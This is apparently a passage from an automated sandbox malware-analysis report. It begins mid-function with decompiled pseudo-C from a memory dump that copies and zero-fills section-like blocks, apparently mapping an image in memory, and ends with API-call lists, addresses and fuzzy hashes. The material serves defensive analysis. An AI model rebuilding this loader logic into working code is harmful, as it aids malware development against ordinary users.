                          				memcpy(_t96, _t52 - _t80 +  *_t12 + __esi, _t80);
                          				_t57 = _v16;
                          				_t103 = (_t99 & 0xfffffff8) - 0x10 + 0x18;
                          				_v12 =  *((intOrPtr*)(_t57 - 0x2efc8c30));
                          				_v8 =  *((intOrPtr*)(_t57 - 0x2efc8c2c));
                          				if(_v20 > 0) {
                          					_t21 = _t98 + 0x6c; // 0x10001967
                          					_t82 = _t21;
                          					do {
                          						_t24 = _t82 + 8; // 0x8bf8e483
                          						_t91 =  *_t24;
                          						_t68 = _v12 + _v12;
                          						asm("adc ecx, [esp+0x14]");
                          						 *(_t96 + 0x14) =  *(_t96 + 0x14) & 0x00000000;
                          						 *_t96 = _t68;
                          						_v12 = _t68;
                          						 *((intOrPtr*)(_t96 + 4)) = 0;
                          						_t29 = _t82 + 4; // 0xec8b5500
                          						_t30 = _t82 - 4; // 0xc78b5e10
                          						_v16 = _t91;
                          						_v8 = 0;
                          						_t96 = _t96 + 0x28;
                          						memcpy( *_t30 + _a4,  *_t29 + _t98, _t91);
                          						_t74 =  *_t82;
                          						_t85 = _v16;
                          						_t103 = _t103 + 0xc;
                          						if(_t74 > _t85) {
                          							_t36 = _t82 - 4; // 0xc78b5e10
                          							memset(_a4 + _t85 +  *_t36, 0, _t74 - _t85);
                          							_t103 = _t103 + 0xc;
                          						}
                          						_t82 = _t82 + 0x14;
                          						_t37 =  &_v20;
                          						 *_t37 = _v20 - 1;
                          					} while ( *_t37 != 0);
                          				}
                          				_t40 = _t98 + 0x30; // 0x1000192b
                          				E10001130(_t40, _a4, _t98, 0xaefa8c48);
                          				_t42 = _t98 + 0x48; // 0x10001943
                          				E10001130(_t42, _a4, _t98, 0xaefa8c47);
                          				_t44 = _t98 + 0x3c; // 0x10001937
                          				E10001130(_t44, _a4, _t98, 0xaefa8c40);
                          				return 0;
                          			}






















                          0x10001ddf
                          0x10001de8
                          0x10001dee
                          0x10001dee
                          0x10001df2
                          0x10001df6
                          0x10001df9
                          0x10001dfd
                          0x10001e01
                          0x10001e07
                          0x10001e0e
                          0x10001e13
                          0x10001e17
                          0x10001e1a
                          0x10001e1d
                          0x10001e1d
                          0x10001e24
                          0x10001e2c
                          0x10001e34
                          0x10001e39
                          0x10001e49
                          0x10001e51
                          0x10001e55
                          0x10001e59
                          0x10001e5f
                          0x10001e5f
                          0x10001e66
                          0x10001e6a
                          0x10001e6a
                          0x10001e6f
                          0x10001e71
                          0x10001e75
                          0x10001e79
                          0x10001e7b
                          0x10001e7f
                          0x10001e82
                          0x10001e89
                          0x10001e8f
                          0x10001e94
                          0x10001e98
                          0x10001e9b
                          0x10001ea0
                          0x10001ea2
                          0x10001ea6
                          0x10001eab
                          0x10001eb5
                          0x10001ebb
                          0x10001ec0
                          0x10001ec0
                          0x10001ec3
                          0x10001ec6
                          0x10001ec6
                          0x10001ec6
                          0x10001e66
                          0x10001ed5
                          0x10001ed8
                          0x10001ee6
                          0x10001ee9
                          0x10001ef7
                          0x10001efa
                          0x10001f06

                          APIs
                          • memcpy.NTDLL(?,4F72F475,FF1075FF,AEFA8C44,00000000,10002030,00000000,?,?,?,?,100018FB), ref: 10001E0E
                          • memcpy.NTDLL(?,4F72F475,C015FF56), ref: 10001E34
                          • memcpy.NTDLL(?,EC8B5500,8BF8E483), ref: 10001E9B
                          • memset.NTDLL ref: 10001EBB
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424126405.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.2424134637.0000000010005000.00000040.00020000.sdmp Download File
                          Similarity
                          • API ID: memcpy$memset
                          • String ID:
                          • API String ID: 438689982-0
                          • Opcode ID: b32bef0ddbd1ed2906b20193bfbfadf02c46f9b85612c9e9f1b81ed2d4865eba
                          • Instruction ID: b22d6739c6a75f304a38dab620e87523a3012855fa86f7c1f8ccca8b9150d8ba
                          • Opcode Fuzzy Hash: b32bef0ddbd1ed2906b20193bfbfadf02c46f9b85612c9e9f1b81ed2d4865eba
                          • Instruction Fuzzy Hash: B2413BB5600201AFD314CF28CD85A9ABBE4FF88294F00852DF849C7705D334FA55CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(00000000,00000001,?,001AE084,?,?,001A884C,00000000,?,?,00000001,00000000,00000101,?,?,001A1FAD), ref: 001AAF3A
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                            • Part of subcall function 001AB675: strchr.NTDLL ref: 001AB689
                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001A884C,00000000,?,?,00000001,00000000,00000101), ref: 001AAF98
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 001AAFA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 001AAFB4
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpystrchr
                          • String ID:
                          • API String ID: 1611392191-0
                          • Opcode ID: ebbca3c37ca707973030695fdd7cdb630e08181817ffc0b7820bb824b6c9c635
                          • Instruction ID: 43f5657a2b1aac0d19fe31fe8a92b1521963c979671c91676239cf4ed8da9ad4
                          • Opcode Fuzzy Hash: ebbca3c37ca707973030695fdd7cdb630e08181817ffc0b7820bb824b6c9c635
                          • Instruction Fuzzy Hash: DC21EEBA504255BFCB166F74CC84AAEBFA8EF17384F058051F9059B212EB31C940D7E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(00000000,001A3D5A,?,?,?,?,?,?,?,?,?,?,?,?,001A895C,00000101), ref: 001AB15B
                          • lstrlenW.KERNEL32(00000000,001A3D5A,?,?,?,?,?,?,?,?,?,?,?,?,001A895C,00000101), ref: 001AB169
                          • memset.NTDLL ref: 001AB175
                          • HeapFree.KERNEL32(00000000,00000000), ref: 001AB186
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: lstrlen$FreeHeapmemset
                          • String ID:
                          • API String ID: 439345311-0
                          • Opcode ID: dff651471126a588326251c67408e4566cf2c3de1cb84684cf2a6ea6f1cd9dfa
                          • Instruction ID: 05c428189db6c7a2319231c3314472d8ed4f9af811a11c2a79d31f931ffb13de
                          • Opcode Fuzzy Hash: dff651471126a588326251c67408e4566cf2c3de1cb84684cf2a6ea6f1cd9dfa
                          • Instruction Fuzzy Hash: 27D05B38505850ABDE112730BE5AF6F392CDF13320F110210F517D48F2E7104592555B
                          Uniqueness

                          Uniqueness Score: -1.00%